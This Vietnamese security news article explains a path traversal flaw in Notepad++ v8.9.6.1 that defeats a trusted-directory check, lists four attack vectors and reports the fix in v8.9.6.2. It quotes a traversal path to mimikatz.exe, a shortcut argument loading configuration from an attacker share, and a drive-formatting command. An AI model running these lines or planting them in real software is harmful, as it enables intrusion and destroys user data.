Lỗ hổng Zero-Click RCE trong Notepad++ qua kỹ thuật Path Traversal

Lỗ hổng Zero-Click RCE trong Notepad++ qua kỹ thuật Path Traversal

Mới đây, cộng đồng bảo mật đã phát hiện một lỗ hổng nguy hiểm trong Notepad++, phiên bản v8.9.6.1, được đánh dấu là CVE-2026-52884. Lỗi này cho phép thực thi mã từ xa (RCE) mà không cần sự xác nhận của người dùng, đồng thời vượt qua hoàn toàn bản vá bảo mật trước đó (CVE-2026-48800).

Vấn đề cốt lõi nằm ở hàm isInTrustedDirectory() được giới thiệu trong bản cập nhật gần đây nhằm ngăn chặn việc thực thi các tệp tin không tin cậy. Tuy nhiên, do thiếu bước chuẩn hóa đường dẫn (canonicalization), kẻ tấn công có thể sử dụng kỹ thuật Path Traversal để lừa hệ thống.

Cơ chế hoạt động của lỗi

Ban đầu, Notepad++ cố gắng chặn các lệnh nguy hiểm bằng cách kiểm tra xem tệp tin thực thi có nằm trong các thư mục tin cậy như C:\Windows\System32\ hay C:\Program Files\ hay không. Tuy nhiên, hàm kiểm tra này chỉ so sánh tiền tố chuỗi (prefix) mà không giải quyết các ký tự duyệt đường dẫn như ...

Do đó, một đường dẫn độc hại như: C:\Windows\System32\..\..\Users\[USERNAME]\Downloads\mimikatz.exe

sẽ vượt qua được bộ lọc vì nó bắt đầu bằng C:\Windows\System32\. Khi thực thi, hệ thống sẽ xử lý phần ..\..\ để quay lại thư mục Downloads và chạy mã độc một cách âm thầm mà không hiển thị bất kỳ cảnh báo nào cho người dùng.

Các vector tấn công chính

Nghiên cứu chỉ ra bốn kịch bản tấn công chính mà kẻ gian có thể tận dụng:

1. Ghi trực tiếp vào file cấu hình: Bất kỳ quy trình nào chạy cùng quyền người dùng đều có thể sửa đổi file shortcuts.xml trong thư mục cài đặt của Notepad++ để chèn lệnh độc hại.
2. Tệp tin shortcut (.lnk) độc hại: Kẻ tấn công có thể tạo một file .lnk với tham số -settingsDir=\\attacker\share\config, khiến Notepad++ tải file cấu hình từ máy chủ từ xa chứa lệnh tấn công.
3. Độc hóa đồng bộ đám mây: Nếu người dùng đồng bộ thư mục cấu hình Notepad++ qua OneDrive hay Dropbox, việc xâm nhập vào tài khoản đám mây cho phép chèn mã độc vào file shortcuts.xml.
4. Sử dụng tệp thực thi tin cậy làm launcher: Ngay cả khi không dùng Path Traversal, kẻ tấn công vẫn có thể gọi cmd.exe hoặc powershell.exe (nằm trong thư mục System32) để thực thi các lệnh tùy ý, ví dụ: cmd.exe /c format C: /fs:NTFS /q /y.

Giải pháp khắc phục

Để bảo vệ máy tính khỏi lỗ hổng này, người dùng cần cập nhật ngay lên phiên bản Notepad++ v8.9.6.2. Bản vá này đã sửa đổi logic kiểm tra bằng cách chuẩn hóa đường dẫn (sử dụng PathCanonicalize) trước khi xác minh xem nó có thuộc thư mục tin cậy hay không, đảm bảo các kỹ thuật .. không còn hiệu lực.

Đây là một lời nhắc nhở quan trọng về sự phức tạp trong việc xác thực đầu vào của đường dẫn tệp tin, ngay cả với các phần mềm phổ biến và được tin dùng như Notepad++.